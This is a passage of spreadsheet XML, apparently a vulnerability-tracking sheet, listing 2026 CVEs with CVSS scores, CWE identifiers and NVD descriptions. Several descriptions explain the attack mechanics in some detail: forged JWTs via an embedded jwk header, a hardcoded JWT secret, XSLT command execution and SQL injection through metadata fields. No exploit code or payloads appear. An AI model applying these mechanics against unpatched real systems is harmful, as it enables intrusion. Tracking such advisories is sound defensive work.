          <t>CWE-347</t>
        </is>
      </c>
      <c r="L202" s="5" t="inlineStr">
        <is>
          <t>Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a JWK Header Injection vulnerability in authlib's JWS implementation allows an unauthenticated attacker to forge arbitrary JWT tokens that pass signature verification. When key=None is passed to any JWS deserialization function, the library extracts and uses the cryptographic key embedded in the attacker-controlled JWT jwk header field. An attacker can sign a token with their own private key, embed the matching public key in the header, and have the server accept the forged token as cryptographically valid — bypassing authentication and authorization entirely. This issue has been patched in version 1.6.9.</t>
        </is>
      </c>
      <c r="M202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27962</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39832</t>
        </is>
      </c>
      <c r="C203" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D203" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E203" s="5" t="inlineStr"/>
      <c r="F203" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G203" s="5" t="inlineStr">
        <is>
          <t>openssh</t>
        </is>
      </c>
      <c r="H203" s="5" t="inlineStr">
        <is>
          <t>golang:crypto</t>
        </is>
      </c>
      <c r="I203" s="5" t="inlineStr">
        <is>
          <t>2026-05-22</t>
        </is>
      </c>
      <c r="J203" s="5" t="inlineStr"/>
      <c r="K203" s="5" t="inlineStr">
        <is>
          <t>CWE-281, CWE-502</t>
        </is>
      </c>
      <c r="L203" s="5" t="inlineStr">
        <is>
          <t>When adding a key to a remote agent constraint extensions such as restrict-destination-v00@openssh.com were not serialized in the request. Destination restrictions were silently stripped when forwarding keys, allowing unrestricted use of the key on the remote host. The client now serializes all constraint extensions. Additionally, the in-memory keyring returned by NewKeyring() now rejects keys with unsupported constraint extensions instead of silently ignoring them.</t>
        </is>
      </c>
      <c r="M203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39832</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41869</t>
        </is>
      </c>
      <c r="C204" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D204" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E204" s="5" t="inlineStr"/>
      <c r="F204" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G204" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H204" s="5" t="inlineStr">
        <is>
          <t>apache:nutch</t>
        </is>
      </c>
      <c r="I204" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J204" s="5" t="inlineStr"/>
      <c r="K204" s="5" t="inlineStr">
        <is>
          <t>CWE-404, CWE-862</t>
        </is>
      </c>
      <c r="L204" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization, Improper Resource Shutdown and Job Interruption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204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41869</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42044</t>
        </is>
      </c>
      <c r="C205" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D205" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E205" s="5" t="inlineStr"/>
      <c r="F205" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G205" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H205" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I205" s="5" t="inlineStr">
        <is>
          <t>2026-04-24</t>
        </is>
      </c>
      <c r="J205" s="5" t="inlineStr"/>
      <c r="K205" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-915</t>
        </is>
      </c>
      <c r="L205" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. From 1.0.0 to before 1.15.2, he Axios library is vulnerable to a Prototype Pollution "Gadget" attack that allows any Object.prototype pollution in the application's dependency tree to be escalated into surgical, invisible modification of all JSON API responses — including privilege escalation, balance manipulation, and authorization bypass. The default transformResponse function at lib/defaults/index.js:124 calls JSON.parse(data, this.parseReviver), where this is the merged config object. Because parseReviver is not present in Axios defaults, not validated by assertOptions, and not subject to any constraints, a polluted Object.prototype.parseReviver function is called for every key-value pair in every JSON response, allowing the attacker to selectively modify individual values while leaving the rest of the response intact. This vulnerability is fixed in 1.15.2.</t>
        </is>
      </c>
      <c r="M205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42044</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48031</t>
        </is>
      </c>
      <c r="C206" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D206" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E206" s="5" t="inlineStr"/>
      <c r="F206" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G206" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H206" s="5" t="inlineStr"/>
      <c r="I206" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J206" s="5" t="inlineStr"/>
      <c r="K206" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L206" s="5" t="inlineStr">
        <is>
          <t>go-base is a Go RESTful API Boilerplate template with JWT Authentication, backed by PostgreSQL. In versions prior to 2026-05-18, the JWT signing secret is hardcoded to the known string "random", letting any attacker who reads the public repository forge tokens for arbitrary users, including admin roles, and completely bypass authentication on all protected endpoints. This value is set in two places: the dev.env template (line 10) and a programmatic fallback in cmd/serve.go (line 35), so the application uses it even when no .env file is present. The original mitigation in auth/jwt/tokenauth.go (lines 22 to 25) only caught the exact string "random", letting other weak secrets through, and replaced it with an in-memory key that was not persisted, invalidating all tokens on every restart and effectively causing a denial-of-service. This issue has been fixed in version 2026-05-18.</t>
        </is>
      </c>
      <c r="M206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48031</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49364</t>
        </is>
      </c>
      <c r="C207" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D207" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E207" s="5" t="inlineStr"/>
      <c r="F207" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G207" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H207" s="5" t="inlineStr"/>
      <c r="I207" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J207" s="5" t="inlineStr"/>
      <c r="K207" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L207" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated network-adjacent attacker can leverage discovery to capture cluster administrative credentials during the initial cluster connection handshake.
This issue affects Apache Artemis: from 2.50.0 through 2.56.0; Apache ActiveMQ Artemis: from 1.0.0 through 2.44.0.
Users are recommended to upgrade to version 2.57.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49364</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53939</t>
        </is>
      </c>
      <c r="C208" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D208" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E208" s="5" t="inlineStr"/>
      <c r="F208" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G208" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H208" s="5" t="inlineStr"/>
      <c r="I208" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J208" s="5" t="inlineStr"/>
      <c r="K208" s="5" t="inlineStr">
        <is>
          <t>CWE-321, CWE-330</t>
        </is>
      </c>
      <c r="L208" s="5" t="inlineStr">
        <is>
          <t>OpenIDC/cjose is a C library implementing the Javascript Object Signing and Encryption (JOSE). In versions 0.6.1 through 0.6.2.5, when cjose encrypts a JWE using an AES-CBC-HMAC content-encryption algorithm (`A128CBC-HS256`, `A192CBC-HS384`, or `A256CBC-HS512`) together with any key-management algorithm that generates a fresh content-encryption key (CEK), the CEK is all zero bytes instead of being randomly generated. The resulting JWE is therefore encrypted and authenticated under a fixed, publicly known key, so anyone who obtains the JWE can recover the plaintext and forge or modify the content. This is fixed in version 0.6.2.6 by `_cjose_jwe_set_cek_aes_cbc()` generating the CEK from `RAND_bytes`. A regression test asserts that the `encrypted_key` differs across two encryptions for each AES-CBC-HMAC variant. Until upgrading, for data encrypted with cjose, three options are available. Use an AES-GCM `enc` (`A128GCM` / `A192GCM` / `A256GCM`) instead of an AES-CBC-HMAC `enc`,  use `alg=dir` with a caller-supplied CEK, or avoid using cjose for JWE encryption with the affected algorithm pair. These are mitigations for new ciphertexts only; data already encrypted under the zero key remains compromised and should be re-encrypted (and any secrets it contained rotated).</t>
        </is>
      </c>
      <c r="M208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53939</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55248</t>
        </is>
      </c>
      <c r="C209" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D209" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E209" s="5" t="inlineStr"/>
      <c r="F209" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G209" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H209" s="5" t="inlineStr"/>
      <c r="I209" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J209" s="5" t="inlineStr"/>
      <c r="K209" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L209" s="5" t="inlineStr">
        <is>
          <t>plone.app.portlets provides portlets and a Plone-specific user interface for plone.portlets. Prior to 5.0.8, 6.0.4, and 7.0.2, a member who can add an RSS portlet can set its feed URL to a very large response, causing src/plone/app/portlets/portlets/rss.py to download and retain excessive data in memory and deny service. The same RSS URL handling accepts internal hosts, IP addresses, single-word domains, and explicit ports, allowing server-side requests that can probe internal network services and open ports. A malicious feed item can also supply a JavaScript URL that is retained as the item link and can execute script when used by a victim. The affected logic includes _rss_feed_url_validator, _normal_url_validator, RSSFeed._retrieveFeed, RSSFeed._buildItemDict, and the FEED_DATA in-memory cache. This issue is fixed in versions 5.0.8, 6.0.4, and 7.0.2.</t>
        </is>
      </c>
      <c r="M209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55248</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55511</t>
        </is>
      </c>
      <c r="C210" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D210" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E210" s="5" t="inlineStr"/>
      <c r="F210" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G210" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H210" s="5" t="inlineStr"/>
      <c r="I210" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J210" s="5" t="inlineStr"/>
      <c r="K210" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L210" s="5" t="inlineStr">
        <is>
          <t>Yamcs is a mission control framework. Prior to 5.12.8 and 5.13.2, Yamcs allows a user with SystemPrivilege.ControlArchiving to create a double-quoted StreamSQL column name that is interpolated into generated Java source by Expression.fillCode_InputDefVars and Expression.sanitizeName. A sum aggregate reaches yamcs-core/src/main/java/org/yamcs/yarch/streamsql/CompilableAggregateExpression.java and yamcs-core/src/main/java/org/yamcs/yarch/streamsql/funct/SumExpression.java through SelectExpression.compile, where Janino SimpleCompiler.cook compiles the injected source. POST /api/archive/{instance}:executeSql can therefore execute arbitrary Java in the Yamcs server process, exposing mission data and credentials and permitting telemetry tampering or denial of service. This issue is fixed in versions 5.12.8 and 5.13.2.</t>
        </is>
      </c>
      <c r="M210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55511</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58400</t>
        </is>
      </c>
      <c r="C211" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D211" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E211" s="5" t="inlineStr"/>
      <c r="F211" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G211" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H211" s="5" t="inlineStr"/>
      <c r="I211" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J211" s="5" t="inlineStr"/>
      <c r="K211" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-94</t>
        </is>
      </c>
      <c r="L211" s="5" t="inlineStr">
        <is>
          <t>GeoNetwork is a catalog application to manage spatially referenced resources. Prior to versions 4.4.12 and 4.2.17, the Saxon XSLT processor used to render formatters is configured without secure processing (`FEATURE_SECURE_PROCESSING`) and without disabling Java extension functions (`ALLOW_EXTERNAL_FUNCTIONS`). Any stylesheet loaded by GeoNetwork can therefore invoke
`java.lang.Runtime.exec()` or `java.lang.ProcessBuilder` directly, achieving arbitrary command execution as the GeoNetwork process user. A user with sufficient privileges to upload a formatter can deliver a `.xsl` file containing Java extension call that execute arbitrary OS commands with the privileges of the GeoNetwork process. The issue is patched in GeoNetwork versions 4.4.12 and 4.2.17.</t>
        </is>
      </c>
      <c r="M211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58400</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67593</t>
        </is>
      </c>
      <c r="C212" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D212" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E212" s="5" t="inlineStr"/>
      <c r="F212" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G212" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H212" s="5" t="inlineStr"/>
      <c r="I212" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J212" s="5" t="inlineStr"/>
      <c r="K212" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L212" s="5" t="inlineStr">
        <is>
          <t>A remote attacker can craft an Openwire RemoveSubscriptionInfo command to cause the deletion of a queue on the Artemis broker before the connection authentication and authorization stage or at any time thereafter. 
This issue affects Apache Artemis: from 2.50.0 through 2.56.0; Apache ActiveMQ Artemis: from 1.0.0 through 2.44.0.
Users are recommended to upgrade to version 2.57.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67593</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69641</t>
        </is>
      </c>
      <c r="C213" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D213" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E213" s="5" t="inlineStr"/>
      <c r="F213" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G213" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H213" s="5" t="inlineStr"/>
      <c r="I213" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J213" s="5" t="inlineStr"/>
      <c r="K213" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L213" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Exchange Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69641</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73069</t>
        </is>
      </c>
      <c r="C214" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D214" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E214" s="5" t="inlineStr"/>
      <c r="F214" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G214" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H214" s="5" t="inlineStr"/>
      <c r="I214" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J214" s="5" t="inlineStr"/>
      <c r="K214" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L214" s="5" t="inlineStr">
        <is>
          <t>Twenty is an open-source CRM (customer relationship management) platform. Prior to 2.15.0, Twenty allowed a workspace administrator with the DATA_MODEL permission to supply settings.asExpression for the system TS_VECTOR field searchVector through PATCH /rest/metadata/fields/:id or the updateOneField GraphQL mutation, causing buildSqlColumnDefinition in packages/twenty-server/src/engine/twenty-orm/workspace-schema-manager/utils/build-sql-column-definition.util.ts to concatenate unescaped input into GENERATED ALWAYS AS (...) and execute arbitrary PostgreSQL statements as the application database user. This issue is fixed in version 2.15.0.</t>
        </is>
      </c>
      <c r="M214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73069</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75156</t>
        </is>
      </c>
      <c r="C215" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D215" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E215" s="5" t="inlineStr"/>
      <c r="F215" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G215" s="5" t="inlineStr">
        <is>
          <t>microsoft, apache, azure</t>
        </is>
      </c>
      <c r="H215" s="5" t="inlineStr"/>
      <c r="I215" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J215" s="5" t="inlineStr"/>
      <c r="K215" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="L215" s="5" t="inlineStr">
        <is>
          <t>Apache Airflow FAB provider versions 3.7.3 through 3.8.0 do not validate the issuer or audience of Azure AD `id_token`s during OAuth login. Deployments are affected only when the FAB auth manager is configured with Azure AD as an OAuth provider. Because the signing keys are fetched from Microsoft's **multi-tenant** JWKS endpoint, an `id_token` minted in *any* Azure tenant — including one the attacker creates — passes signature verification, and the username and role assignments are then read from that attacker-controlled token. Anyone able to register an Azure tenant can therefore authenticate to the Airflow UI with no prior access to the deployment.
The fix for **CVE-2026-59243** was incomplete, and this advisory closes the remaining gap: that fix made the provider verify the `id_token` signature, but did not add issuer or audience checks. Operators who already applied the CVE-2026-59243 fix are **still affected and must upgrade again** — 3.7.3 is the release that shipped that fix, so every version containing it falls inside this affected range. Upgrade to apache-airflow-providers-fab `3.8.1` or later.</t>
        </is>
      </c>
      <c r="M215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75156</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75595</t>
        </is>
      </c>
      <c r="C216" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D216" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E216" s="5" t="inlineStr"/>
      <c r="F216" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G216" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H216" s="5" t="inlineStr"/>
      <c r="I216" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J216" s="5" t="inlineStr"/>
      <c r="K216" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="L216" s="5" t="inlineStr">
        <is>
          <t>Netty is an asynchronous, event-driven network application framework. Prior to 4.1.137.Fina and 4.2.17.Final, io.netty.handler.ssl.SslClientHelloHandler#decode checks the wrong offset before reading the four-byte TLS handshake header, so a ClientHello whose handshake header spans records can cause an IndexOutOfBoundsException and invoke select(ctx, null). This selects the default SslContext instead of the SNI-specific context. In deployments where per-SNI clientAuth=REQUIRE is the sole mutual TLS gate, the default SslContext uses clientAuth=NONE or clientAuth=OPTIONAL, and no application-layer certificate verification exists, an unauthenticated remote attacker can bypass the protected route's mutual TLS requirement. This issue is fixed in versions 4.1.137.Final and 4.2.17.Final.</t>
        </is>
      </c>
      <c r="M216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75595</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79571</t>
        </is>
      </c>
      <c r="C217" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D217" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E217" s="5" t="inlineStr"/>
      <c r="F217" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G217" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="H217" s="5" t="inlineStr"/>
      <c r="I217" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J217" s="5" t="inlineStr"/>
      <c r="K217" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L217" s="5" t="inlineStr">
        <is>
          <t>Incorrect access control in the SellerAuthorizeAspect component of springboot-project v1.0.0 allows unauthenticated attackers to access all seller management interfaces and list all products/orders, put products on/off sale, finish/cancel orders, and modify categories without authentication.</t>
        </is>
      </c>
      <c r="M217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79571</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80181</t>
        </is>
      </c>
      <c r="C218" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D218" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E218" s="5" t="inlineStr"/>
      <c r="F218" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G218" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H218" s="5" t="inlineStr"/>
      <c r="I218" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J218" s="5" t="inlineStr"/>
      <c r="K218" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L218" s="5" t="inlineStr">
        <is>
          <t>Apache Allura's webhooks are vulnerable to Server-Side Request Forgery (SSRF).
This issue affects Apache Allura: through 1.20.0.
Users are recommended to upgrade to version 1.21.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80181</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80424</t>
        </is>
      </c>
      <c r="C219" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D219" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E219" s="5" t="inlineStr"/>
      <c r="F219" s="5" t="inlineStr"/>
      <c r="G219" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H219" s="5" t="inlineStr"/>
      <c r="I219" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J219" s="5" t="inlineStr"/>
      <c r="K219" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L219" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to create arbitrary files due to path traversal during archive extraction.</t>
        </is>
      </c>
      <c r="M219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80424</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84939</t>
        </is>
      </c>
      <c r="C220" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D220" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E220" s="5" t="inlineStr"/>
      <c r="F220" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G220" s="5" t="inlineStr">
        <is>
          <t>java, apache</t>
        </is>
      </c>
      <c r="H220" s="5" t="inlineStr"/>
      <c r="I220" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J220" s="5" t="inlineStr"/>
      <c r="K220" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="L220" s="5" t="inlineStr">
        <is>
          <t>Path traversal vulnerability in Apache FreeMarker template loading mechanism, if the attacker can specify an arbitrary malformed locale identifier to FreeMarker, and the localized lookup configuration setting is enabled (it's by default enabled).
This issue affects Apache FreeMarker from 2.2.0 through 2.3.34.
Users are recommended to upgrade to version 2.3.35. Disabling localized lookup in previous versions also mitigates this.
Note that even in versions affected by this vulnerability, the files that can be loaded remain restricted by the TemplateLoader that FreeMarker is configured to use. In particular, FileTemplateLoader prevents attempts to traverse outside the baseDir specified in its constructor. Other TemplateLoader implementations may allow access outside their designated base directory, but they are still constrained by the underlying storage mechanism—for example, a loader wrapping a Java class loader can only access resources that the class loader can load, while one wrapping a web application context can only access resources available through that context.</t>
        </is>
      </c>
      <c r="M220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84939</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86729</t>
        </is>
      </c>
      <c r="C221" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D221" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E221" s="5" t="inlineStr"/>
      <c r="F221" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G221" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H221" s="5" t="inlineStr"/>
